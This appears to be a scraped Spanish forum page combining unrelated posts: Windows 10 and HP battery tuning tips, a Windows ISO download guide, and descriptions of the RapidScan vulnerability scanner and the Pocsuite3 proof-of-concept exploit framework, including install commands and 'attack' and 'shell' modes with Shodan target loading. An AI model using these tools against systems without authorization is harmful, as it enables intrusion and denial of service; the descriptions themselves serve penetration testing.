Más información sobre el curso Informática Forense bajo entorno Windows en la web de COPITEC You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Referencia: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Solo mencionar que en este caso si su equipo es Hp se recomienda revisar el manual de mantenimiento y servicio ya que algunos escaner´s para ver cuanta ram puedes instalar en el equipo puede no dar resultados certeros, tambien Hp recomienda crucial:You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Mejorar el rendimiento de Windows 10 es una tarea muy fácil que además podemos conseguir sin tener que gastar dinero en mejorar nuestro PC. El nuevo sistema operativo de Microsoft cuenta con una optimización bastante buena y no requiere de una gran cantidad de recursos para funcionar correctamente, pero es cierto que en configuraciones muy modestas puede acabar dando algunos problemas.

En este tutorial os vamos a enseñar paso a paso cómo podéis mejorar el rendimiento de Windows 10 al instante, de forma sencilla y sin tener correr ningún tipo de riesgo. Poneos cómodos, que empezamos.

Mejorar el rendimiento de Windows 10: plan de energía



El primer paso para mejorar el rendimiento de Windows 10 pasa por utilizar un plan de energía de alto rendimiento. Es muy fácil:

En la barra de búsqueda de Cortana escribe "Editar Plan de Energía" y selecciona el primer resultado.
Una vez dentro elige la opción "Cambiar la Configuración Avanzada de Energía".
Puedes seleccionar el plan de alto rendimiento, que viene por defecto con una configuración determinada, personalizar tu propio plan.

Mejorar el rendimiento de Windows 10: deshabilitar efectos y animaciones


Es una solución que puede complementar a la anterior, aunque también funciona de manera independiente. Reduce las "florituras" gráficas y a nivel de interfaz visual para mejorar el rendimiento. Estos son los pasos a seguir:

Pulsamos al mismo tiempo "Windows + R" para abrir la ventana "Ejecutar".
En el espacio de aquella escribimos, sin comillas, el comando "sysdm.cpl".
Ahora estamos en "Propiedades del Sistema", donde deberemos ir a "Opciones Avanzadas" y "Configuración", dentro de la categoría "Rendimiento".
Por último seleccionamos la opción "Ajustar para Obtener el Mejor Rendimiento".

Mejorar el rendimiento de Windows 10: reducir programas de inicio


Nos ayudará a reducir el tiempo de inicio del sistema. Es una medida pensada para complementar a las dos anteriores. Estos son los pasos que debemos dar:

Pulsamos "control + alt + suprimir" para abrir el "Administrador de Tareas".
Nos vamos a "Inicio" y seleccionamos los programas que queremos deshabilitar haciendo clic en ellos con el botón derecho del ratón.
Los programas de inicio pueden tener un impacto bajo, medio o alto en el tiempo de arranque, así que deshabilitar unos u otros puede tener un resultado diferente.

Referencia: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Evolución:
Es bastante complicado para un pentester realizar un escaneado de herramientas de borrachera ( ejecutando herramientas de escaneo de seguridad una tras otra ) sin automatización. A menos que usted sea un profesional en la automatización de tareas, es una tarea muy importante realizar un escaneo en exceso para cada compromiso. El objetivo final de este programa es resolver este problema a través de la automatización; verbigracia. ejecutar múltiples herramientas de exploración para descubrir vulnerabilidades, juzgar efectivamente los falsos positivos, correlacionar colectivamente los resultados y ahorra un tiempo precioso ; todo esto bajo un mismo techo.

Características:
Instalación en un solo paso .
ejecuta una multitud de herramientas de análisis de seguridad , realiza otras comprobaciones personalizadas e imprime los resultados de forma espontánea .
Algunas de las herramientas incluyen nmap, dnsrecon, wafw00f, uniscan, sslyze, fierce, lbd, theharvester, dnswalk, golismero etc. nmap, dnsrecon, wafw00f, uniscan, sslyze, fierce, lbd, theharvester, dnswalk, golismero bajo una sola entidad.
¡Ahorra mucho tiempo, de hecho mucho tiempo! .
comprueba las mismas vulnerabilidades con múltiples herramientas para ayudarlo a concentrarse en falsos positivos de manera efectiva.
Leyendas para ayudarlo a comprender qué pruebas pueden tomar más tiempo, por lo que puede Ctrl+C para omitirlas si es necesario.
asociación con OWASP Top 10 2017 en la lista de vulnerabilidades descubiertas. ( en desarrollo )
Clasificación crítica, alta, media, baja e informativa de vulnerabilidades.
las definiciones de vulnerabilidad le orientan sobre la vulnerabilidad real y la amenaza que puede representar. ( en desarrollo )
remediations le dice cómo conectar / arreglar la vulnerabilidad encontrada. ( en desarrollo )
El resumen ejecutivo le brinda un contexto general de la exploración realizada con problemas críticos, altos, bajos e informativos descubiertos. ( en desarrollo )
Inteligencia artificial para desplegar herramientas automáticamente dependiendo de los problemas encontrados. por ejemplo; automatiza el lanzamiento de las herramientas wpscan y plecost cuando se encuentra una instalación de wordpress. ( en desarrollo )
Informe detallado en un formato de documento portátil (* .pdf) con detalles completos de las exploraciones y herramientas utilizadas. ( en desarrollo )

Para tu información:
El programa aún está en desarrollo, funciona y actualmente admite 80 pruebas de vulnerabilidad.
El procesamiento paralelo aún no está implementado, puede codificarse a medida que se introducen más pruebas.

Controles de vulnerabilidad:
Balanceadores de carga DNS / HTTP y firewalls de aplicaciones web.
Verificaciones de Joomla, WordPress y Drupal
Vulnerabilidades relacionadas con SSL ( HEARTBLEED, FREAK, POODLE, CCS Injection, LOGJAM, OCSP Stapling ).
Puertos comúnmente abiertos.
Transferencias de zona DNS utilizando múltiples herramientas ( Fierce, DNSWalk, DNSRecon, DNSEnum ).
Subdominios de fuerza bruta.
Abrir el directorio / archivo de fuerza bruta.
Shallow XSS, SQLi y Banners BSQLi.
Slow-Loris DoS Attack, LFI ( inclusión de archivos locales ), RFI ( inclusión de archivos remotos ) y RCE ( ejecución remota de código ).
y más por venir ...

Requerimientos:
Python 2.7
Kali OS ( preferido , ya que se envía con casi todas las herramientas )
Para otros sabores de SO, trabajar en un soporte de docker. Aférrate.

Uso:
Descarga el script y otorga permisos ejecutables.

wget -O rapidscan.py https://raw.githubusercontent.com/skavngr/rapidscan/master/rapidscan.py && chmod +x rapidscan.py

Ayuda:


Salida:




Referencia: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Pocsuite3 es un marco de prueba de vulnerabilidad remota y desarrollo de prueba de concepto abierto desarrollado por el equipo Knownsec 404 . Viene con un potente motor de prueba de concepto, muchas funciones potentes para los probadores de penetración y los investigadores de seguridad.

Caracteristicas

• PoC guiones pueden correr con attack, verify, shellel modo en forma diferente
  Ecosistema de plugin
• Guión de PoC de carga dinámica desde cualquier lugar (archivo local, redis, base de datos, Seebug ...)
• Cargue multi-target desde cualquier lugar (CIDR, archivo local, redis, base de datos, Zoomeye, Shodan ...)
• Los resultados pueden ser fácilmente exportados
• Peticiones dinámicas de parche y gancho
• Tanto la herramienta de línea de comandos como el paquete python se importan para usar
• Soporte de IPV6
• Soporte global HTTP / HTTPS / SOCKS proxy
• API de araña simple para usar el script PoC
• Integrar con Seebug (para cargar PoC desde el sitio web de Seebug)
• Integrar con ZoomEye (para el objetivo de carga de ZoomEye Dork)
• Integrar con Shodan (para el objetivo de carga de Shodan Dork)
• Integrar con Ceye (para verificar solicitudes ciegas de DNS y HTTP)
• Depuración amigable de las secuencias de comandos PoC con IDE
  Más ...

Capturas de pantalla delmodo consola de pocsuite3.


Modo pocsuite3 shell


pocsuite3 carga PoC de Seebug


pocsuite3 carga multi-objetivo desde ZoomEye


pocsuite3 carga multi-objetivo de Shodan


Requerimientos

• Python 3.4+
• Funciona en Linux, Windows, Mac OSX, BSD.

Instalación de forma rápida:
[/list]

$ pip install pocsuite3

O haga clic en You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login para descargar el último archivo zip fuente y extraerlo.

$ wget https://github.com/knownsec/pocsuite3/archive/master.zip
$ unzip master.zip 

La última versión de este software está disponible en: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Documentación
La documentación está disponible en el directorio english docs.
En English: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Descargar Pocsuite3: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Referencia: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Un equipo nuevo cuanto mas rápido trabaja utiliza toda la capacidad del hardware y eso hace que más rápido se desgaste la energía que está en la bateria.Cuando usted reduce el potencial del procesador, puede hacer que la carga de su batería rinda mas.

Recuerde que si el equipo se expone a altas temperaturas de manera constante la bateria ion litio se desgastará de manera mas rápida hasta deteriorarse completamente.

Es necesario que aplique pasta termica arctic silver 5 en el procesador.

Quizá a muchos usuarios se les ha presentado el problema en la bateria y calentamiento excesivo para este tipo de ordenadores dedicados al gaming y el siguiente método también puede ser aplicable en mas equipos.

Para ello,realice lo siguiente:

1-Aun lado del símbolo de Windows,escriba Panel de control.


2-En el panel de control,utilice el buscador que está en la parte superior al lado derecho y busque Opciones de energía.


3-Seleccione Cambiar la configuración de la batería.


4-Haga clic en Crear un plan de energía.


5-Seleccione el Recomendado por Hp y si usted desea puede agregar otro nombre al nuevo nombre del plan,para que después haga clic en Siguiente.

6-En la siguiente sección de clic en Crear.


7-Después va a Cambiar la configuración del plan nuevo.


8-Haga clic en Cambiar la configuración avanzada de energía .


9-En la nueva ventana llamada Configuración avanzada,busque Administración de energía del procesador y dirígase a donde dice Estado máximo del procesador para que por último en Con bateria cambie el porcentaje y ponga aproximadamente un 30 % , por ultimo de clic en Aplicar y Aceptar.


*****************************************************************************************
Preguntas que les puede surgir.

1-¿Se puede poner hasta 0 %?
Si es posible,y lo único es que el rendimiento baja pero no es problema para navegar y hacer tareas donde no consuma muchos recursos.

2-¿Cuantas horas o minutos duraría mas la batería?
En algunos equipos puede rendir de una hora a dos mas aproximadamente.

Espero ayudar en este foro.
Saludos a todos!

Primero, diríjase a You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login y obtenga la herramienta de descarga ISO de Microsoft Windows y Office . Es gratis y es una herramienta portátil, por lo que no hay instalación. Solo ejecuta el archivo ejecutable. En la ventana principal, elija la versión de Windows u Office que desea descargar.

Puede descargar la herramienta desde: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login



Haga clic en el menú desplegable "Seleccionar edición" y luego elija la edición que desee. Tenga en cuenta que además de las ediciones regulares del producto (como Home o Professional), también puede descargar ediciones específicas de regiones como Windows N (que se vende al mercado europeo y no incluye aplicaciones multimedia como Media Player y DVD Maker). ) y Windows K (que se vende al mercado coreano).


Después de seleccionar la edición que desea descargar, haga clic en "Confirmar".


A continuación, use el menú desplegable que aparece para elegir el idioma del producto que desea descargar y luego haga clic en el botón "Confirmar" debajo del menú desplegable de idiomas.


Finalmente, elija si desea descargar la versión de 32 bits o de 64 bits del producto. Al hacer clic en cualquiera de los botones de descarga se iniciará la descarga utilizando la herramienta de descarga ISO, por lo que deberá mantenerla abierta hasta que finalice la descarga. Alternativamente, puede usar los botones "Copiar enlace" a la derecha para copiar el enlace de descarga directa a su portapapeles y luego descargar el archivo usando su navegador. De cualquier manera, tenga en cuenta que la mayoría de los enlaces generados por la herramienta solo son válidos durante 24 horas, aunque siempre puede volver y generar nuevos enlaces.


Referencia: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login